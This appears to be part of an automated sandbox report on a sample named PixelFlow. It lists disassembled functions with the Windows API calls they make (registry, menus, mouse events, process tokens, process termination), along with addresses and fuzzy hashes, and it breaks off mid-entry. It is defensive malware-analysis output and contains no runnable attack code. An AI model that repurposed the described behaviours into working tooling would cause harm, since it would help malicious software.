Opcode Fuzzy Hash: 9bba204488a55b19d7124b81c81dfa9c5d47fba9b2a444a3d532da777cbeb894
Instruction Fuzzy Hash: BBE01AB0690321AFEF119FB0EC5DF74366BAB25B02F506425B451D99B0DFB540988F00

Function 006241BE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006240D8), ref: 006241D8
GetProcAddress.KERNEL32(00000000), ref: 006241DF
EncodePointer.KERNEL32(00000000), ref: 006241EA
DecodePointer.KERNEL32(006240D8), ref: 00624205

Strings

combase.dll, xrefs: 006241D3
RoUninitialize, xrefs: 006241C7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 005ef6a6d380fd5d305d8013e8c4e31c65194113528a37fd05ccedb6d04fc6bb
Instruction ID: e4d2066d5a5bcfdd6d2430ed38ff38be0df3f373981ef578c92cd38cfed06fa9
Opcode Fuzzy Hash: 005ef6a6d380fd5d305d8013e8c4e31c65194113528a37fd05ccedb6d04fc6bb
Instruction Fuzzy Hash: 98E0B678551321AFEB109F61BD6DF643ABBBB24702F142116F041D5EA0CFB54688CA90

Function 0060218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 006021B8
GetWindowRect.USER32(?,?), ref: 006021F9
ScreenToClient.USER32(?,?), ref: 00602221
GetClientRect.USER32(?,?), ref: 00602350
GetWindowRect.USER32(?,?), ref: 00602369

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 552651875bf3774b575aa1f3f16ec4c286e0f611142f3c9d91cbafebecc8a1f1
Instruction ID: 3b3ea650cf6aa2765861c1ccdd7f5ccb22ab3212e2fcd48add5c0d49a00a6c4b
Opcode Fuzzy Hash: 552651875bf3774b575aa1f3f16ec4c286e0f611142f3c9d91cbafebecc8a1f1
Instruction Fuzzy Hash: 11B16B3990024ADBDF18CFA8C5947EEB7B2FF08310F149129ED59AB354EB30AA51CB54

Function 006668E0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00666A33
_memmove.LIBCMT ref: 0066696E

Part of subcall function 00604D37: __itow.LIBCMT ref: 00604D62
Part of subcall function 00604D37: __swprintf.LIBCMT ref: 00604DAC

_memmove.LIBCMT ref: 006669E1
_memmove.LIBCMT ref: 00666AC8
_memmove.LIBCMT ref: 00666AE1
_memmove.LIBCMT ref: 00666AFD

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: e0977b7227607134c275781baa0daae26417ccf8bd4fdf4e3bd3804ebcb109d2
Instruction ID: 5546cb2b07dd659c3003d9148855cbfdf538a2fa4273471c400ef7d6b7bfced2
Opcode Fuzzy Hash: e0977b7227607134c275781baa0daae26417ccf8bd4fdf4e3bd3804ebcb109d2
Instruction Fuzzy Hash: 0C61DB7050065AABDF25EF60D882EFE37A6AF45308F04851CFD566B2D2DB30AD05CB99

Function 0068060C Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

Part of subcall function 00681242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006801D5,?,?), ref: 00681259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006806E5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00680725
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00680748
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00680771
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006807B4
RegCloseKey.ADVAPI32(00000000), ref: 006807C1

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 9d482ecf86011c50d10ee1a4137934bc9ba6343201dfd0cfcb9c6b73768d6724
Instruction ID: 273dee01c1df3c494a77330480e7328695264ead7d42f092644e1d883e4bd0a9
Opcode Fuzzy Hash: 9d482ecf86011c50d10ee1a4137934bc9ba6343201dfd0cfcb9c6b73768d6724
Instruction Fuzzy Hash: 8E51AC31108200AFE750EF24C885EABBBEAFF85314F044A1DF5558B2A1DB31E949CF96

Function 00685B9E Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00685C00
GetMenuItemCount.USER32(00000000), ref: 00685C37
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00685C5F
GetMenuItemID.USER32(?,?), ref: 00685CCE
GetSubMenu.USER32(?,?), ref: 00685CDC
PostMessageW.USER32(?,00000111,?,00000000), ref: 00685D2D

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 9c51124de90269cc185af927413c9924b91156f524d99b48187179544fa7f36b
Instruction ID: bb01b3ac533a2ac23a9e633c58d00a9a9460b2d1cafaef1e8702f004d108c6b9
Opcode Fuzzy Hash: 9c51124de90269cc185af927413c9924b91156f524d99b48187179544fa7f36b
Instruction Fuzzy Hash: 5651AD71A00A25AFDF11EF94C945AEEB7B6EF48310F10415AED02BB391CB30AE418F94

Function 0065F46B Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0065F485
VariantClear.OLEAUT32(00000013), ref: 0065F4F7
VariantClear.OLEAUT32(00000000), ref: 0065F552
_memmove.LIBCMT ref: 0065F57C
VariantClear.OLEAUT32(?), ref: 0065F5C9
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0065F5F7

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 177e70d49f3c1e9838bfbed00b0c56ba90b3148593bde5359ebd72090b03e634
Instruction ID: cfae04af8ccd8d7ab558c3fd960658c61339ae6579ef284e4cf1956ae30cc0ed
Opcode Fuzzy Hash: 177e70d49f3c1e9838bfbed00b0c56ba90b3148593bde5359ebd72090b03e634
Instruction Fuzzy Hash: 7C5125B5A00209EFDB14CF58C884AAAB7B9FF48314F15856AED59DB304E730E955CFA0

Function 0066281D Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0066286B
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006628B6
IsMenu.USER32(00000000), ref: 006628D6
CreatePopupMenu.USER32 ref: 0066290A
GetMenuItemCount.USER32(000000FF), ref: 00662968
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00662999

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 09b4f4b9485c9275f6042d5f3ad7e4309d9ac361b9c015dbc7fe3e2877f7bfa2
Instruction ID: 4c64f0b0d25c8d82d046215c87ed052f807b060eb1d26d0bcbdd0c2d1300e75b
Opcode Fuzzy Hash: 09b4f4b9485c9275f6042d5f3ad7e4309d9ac361b9c015dbc7fe3e2877f7bfa2
Instruction Fuzzy Hash: D551D07060060BEFDF24CF65C9A8BEEBBF6AF85314F14461AE85097390D3709904CB61

Function 00601B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00601B76
GetWindowRect.USER32(?,?), ref: 00601BDA
ScreenToClient.USER32(?,?), ref: 00601BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00601C08
EndPaint.USER32(?,?), ref: 00601C52

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 38c544838efaa1cf0a0f68c5bf7ba212954177fcb420f464d6c1765631b15b36
Instruction ID: b2f2c975a38789ddbb07d9378e4319c4ca1e7a2b15cf3606cddeb398b05e1e39
Opcode Fuzzy Hash: 38c544838efaa1cf0a0f68c5bf7ba212954177fcb420f464d6c1765631b15b36
Instruction Fuzzy Hash: 26416C71144204AFE711DF24CC84FBB7BEAEB5A320F140669FAA58A2E2C731D845DB65

Function 0068BA8B Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006C67B0,00000000,00CE55D0,?,?,006C67B0,?,0068B995,?,?), ref: 0068BAFF
EnableWindow.USER32(?,00000000), ref: 0068BB23
ShowWindow.USER32(006C67B0,00000000,00CE55D0,?,?,006C67B0,?,0068B995,?,?), ref: 0068BB83
ShowWindow.USER32(?,00000004,?,0068B995,?,?), ref: 0068BB95
EnableWindow.USER32(?,00000001), ref: 0068BBB9
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0068BBDC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 19eebc5630906a182df164bdaea79bd0c1bd4a0ef5a1c8f8852544bb0264bed0
Instruction ID: 435821baec9b5178d8f6d3756727e9103725c3517dcd2dc18ca0e17f0bb55603
Opcode Fuzzy Hash: 19eebc5630906a182df164bdaea79bd0c1bd4a0ef5a1c8f8852544bb0264bed0
Instruction Fuzzy Hash: 10412134600144EFDB25DF24C899BE47BE2FF09314F1892B9E9988F3A6CB71A855CB51

Function 0067754D Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,006752F1,?,?,00000000,00000001), ref: 0067755B

Part of subcall function 00673E50: GetWindowRect.USER32(?,?), ref: 00673E63

GetDesktopWindow.USER32 ref: 00677585
GetWindowRect.USER32(00000000), ref: 0067758C
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006775BE

Part of subcall function 0066566C: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006656E4

GetCursorPos.USER32(?), ref: 006775EA
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00677648

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 063ac3f5de594760cc7e5bca772791292c552da709afc7001a4f21737f10fe9d
Instruction ID: a3ff960f3b091b2fed6a10cffb9c5772a18b9d7bb4d9eef2f89937c99acb6616
Opcode Fuzzy Hash: 063ac3f5de594760cc7e5bca772791292c552da709afc7001a4f21737f10fe9d
Instruction Fuzzy Hash: 5031B072508305AFE720DF14CC49E9BB7EAFF88314F00491AF59997191DB70EA18CB96

Function 00659214 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00658AAA: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00658AC1
Part of subcall function 00658AAA: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00658ACB
Part of subcall function 00658AAA: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00658ADA
Part of subcall function 00658AAA: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00658AE1
Part of subcall function 00658AAA: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00658AF7

GetLengthSid.ADVAPI32(?,00000000,00658E30), ref: 00659265
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00659271
HeapAlloc.KERNEL32(00000000), ref: 00659278
CopySid.ADVAPI32(00000000,00000000,?), ref: 00659291
GetProcessHeap.KERNEL32(00000000,00000000,00658E30), ref: 006592A5
HeapFree.KERNEL32(00000000), ref: 006592AC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 75fdca973e70a65b04dd11f98cf0647522c5ad13521653f94721d4e79bf04a00
Instruction ID: 3fae09ba816ab300034e512721e5a40c5b17242e371f8f70de3f7b4ee97bbf90
Opcode Fuzzy Hash: 75fdca973e70a65b04dd11f98cf0647522c5ad13521653f94721d4e79bf04a00
Instruction Fuzzy Hash: C4117C32621204FFEB109FA4CC09BFE7BAEEF45316F10405AF84597610D732AA48DB60

Function 00658FB2 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00658FE3
OpenProcessToken.ADVAPI32(00000000), ref: 00658FEA
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00658FF9
CloseHandle.KERNEL32(00000004), ref: 00659004
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00659033
DestroyEnvironmentBlock.USERENV(00000000), ref: 00659047

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: ab5d43b6394d345f926de70093f2b55db1c28398afe7fd118bf802f61c3c6549
Instruction ID: ff533735c0a1c52588f284a2b31c0acaff64ae75d73e71bca971afdc7f1e43f9
Opcode Fuzzy Hash: ab5d43b6394d345f926de70093f2b55db1c28398afe7fd118bf802f61c3c6549
Instruction Fuzzy Hash: 71114772501249EFEB118FA4ED49FDA7BAAEB08345F044055FE04A2160D2729E65EB60

Function 0065C10C Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0065C131
GetDeviceCaps.GDI32(00000000,00000058), ref: 0065C142
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0065C149
ReleaseDC.USER32(00000000,00000000), ref: 0065C151
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0065C168
MulDiv.KERNEL32(000009EC,?,?), ref: 0065C17A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 9508d61dffbbc0ab438755e6f09bfa8a30b8dd4e95c816b6f51f26f4bdbfd398
Instruction ID: a211f34591a92fa2253165adeddc645e1a2cb626303e0cc97cca854b627fdcf6
Opcode Fuzzy Hash: 9508d61dffbbc0ab438755e6f09bfa8a30b8dd4e95c816b6f51f26f4bdbfd398
Instruction Fuzzy Hash: 85017176A00308BFEB109FA69C49A5EBFA9EF58361F004066FE04A7281D6309910CFA0

Function 0068C2CD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 006016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00601729
Part of subcall function 006016CF: SelectObject.GDI32(?,00000000), ref: 00601738
Part of subcall function 006016CF: BeginPath.GDI32(?), ref: 0060174F
Part of subcall function 006016CF: SelectObject.GDI32(?,00000000), ref: 00601778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0068C2F7
LineTo.GDI32(00000000,00000003,?), ref: 0068C30B
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068C319
LineTo.GDI32(00000000,00000000,?), ref: 0068C329
EndPath.GDI32(00000000), ref: 0068C339
StrokePath.GDI32(00000000), ref: 0068C349

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 811104d7db4dea4851c29ee735cab527c9d4a2c65b4d5c6993994c6e59b97337
Instruction ID: da07219a556df85217a0d81c0ec7b16480b2bb4ba3c2c0646fc804a675832f28
Opcode Fuzzy Hash: 811104d7db4dea4851c29ee735cab527c9d4a2c65b4d5c6993994c6e59b97337
Instruction Fuzzy Hash: B511C97600010DBFEF129F94DC88EEA7FAEEB08364F048056BA189A170D7729D55DBA0

Function 006206E6 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00620717
MapVirtualKeyW.USER32(00000010,00000000), ref: 0062071F
MapVirtualKeyW.USER32(000000A0,00000000), ref: 0062072A
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00620735
MapVirtualKeyW.USER32(00000011,00000000), ref: 0062073D
MapVirtualKeyW.USER32(00000012,00000000), ref: 00620745

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 20e2b588314a3ae2c95cbe05b27db856536d757aa8c25f2ac0b8c7276c823cd0
Instruction ID: a4c6881e8b1182e90a364703b36eb64a7778831429a10daca6e1c423f9809f4a
Opcode Fuzzy Hash: 20e2b588314a3ae2c95cbe05b27db856536d757aa8c25f2ac0b8c7276c823cd0
Instruction Fuzzy Hash: 25016CB09017597DE3008F5A8C85B52FFB8FF59354F00411BA15C47941C7F5A864CBE5

Function 00665811 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00665821
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00665837
GetWindowThreadProcessId.USER32(?,?), ref: 00665846
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00665855
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0066585F
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00665866

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 8dc7fb2dbc6b938e5149b974b5579b62c32400f6c9cbc332ce9d4611138182af
